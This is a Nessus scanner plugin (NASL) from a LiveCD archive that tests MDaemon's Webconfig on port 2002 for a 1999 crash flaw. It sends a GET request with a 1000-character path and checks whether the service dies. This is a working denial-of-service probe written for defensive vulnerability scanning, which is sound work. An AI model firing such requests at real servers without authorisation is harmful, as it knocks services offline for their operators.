home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / mdaemon_webconfig.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  85 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10138);
  10.  script_bugtraq_id(820);
  11.  script_version ("$Revision: 1.11 $");
  12.  script_cve_id("CAN-1999-0844");
  13.  name["english"] = "MDaemon Webconfig crash";
  14.  name["francais"] = "Plantage de Webconfig de MDaemon";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "It was possible to crash the 
  18. remote Webconfig, used to configure Mdaemon
  19. by sending the request :
  20.  
  21.     GET /aaaaa[...]aaa HTTP/1.0
  22.     
  23.     
  24.  
  25. This problem allows an attacker to prevent you
  26. from configuring the mdaemon server remotely.
  27.  
  28. Solution : contact your vendor for a fix.
  29.  
  30. Risk factor : Medium";
  31.  
  32.  
  33.  desc["francais"] = "Il s'est avΘrΘ possible de faire
  34. planter le service Webconfig de mdaemon, utilisΘ
  35. pour configurer ce serveur α distance.
  36.  
  37. Ce problΦme permet α des pirates de vous
  38. empecher de configurer mdaemon α distance.
  39.  
  40. Solution : contactez votre vendeur pour un patch.
  41.  
  42. Facteur de risque : Moyen.";
  43.  
  44.  script_description(english:desc["english"], francais:desc["francais"]);
  45.  
  46.  summary["english"] = "Crashes the remote service";
  47.  summary["francais"] = "Fait planter le service distant";
  48.  script_summary(english:summary["english"], francais:summary["francais"]);
  49.  
  50.  script_category(ACT_DENIAL);
  51.  
  52.  
  53.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  54.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  55.  family["english"] = "Denial of Service";
  56.  family["francais"] = "DΘni de service";
  57.  script_family(english:family["english"], francais:family["francais"]);
  58.  script_dependencie("find_service.nes", "httpver.nasl");
  59.  script_require_ports(2002);
  60.  exit(0);
  61. }
  62.  
  63. #
  64. # The script code starts here
  65. #
  66.  
  67. include("http_func.inc");
  68.  
  69. port = 2002;
  70. if(get_port_state(port))
  71. {
  72.  if(http_is_dead(port:port))exit(0);
  73.  
  74.  soc = http_open_socket(port);
  75.  if(soc)
  76.  {
  77.   data = http_get(item:crap(1000), port:port);
  78.   send(socket:soc, data:data);
  79.   r = http_recv(socket:soc);
  80.   http_close_socket(soc);
  81.   
  82.   if(http_is_dead(port:port))security_warning(port);
  83.  }
  84. }
  85.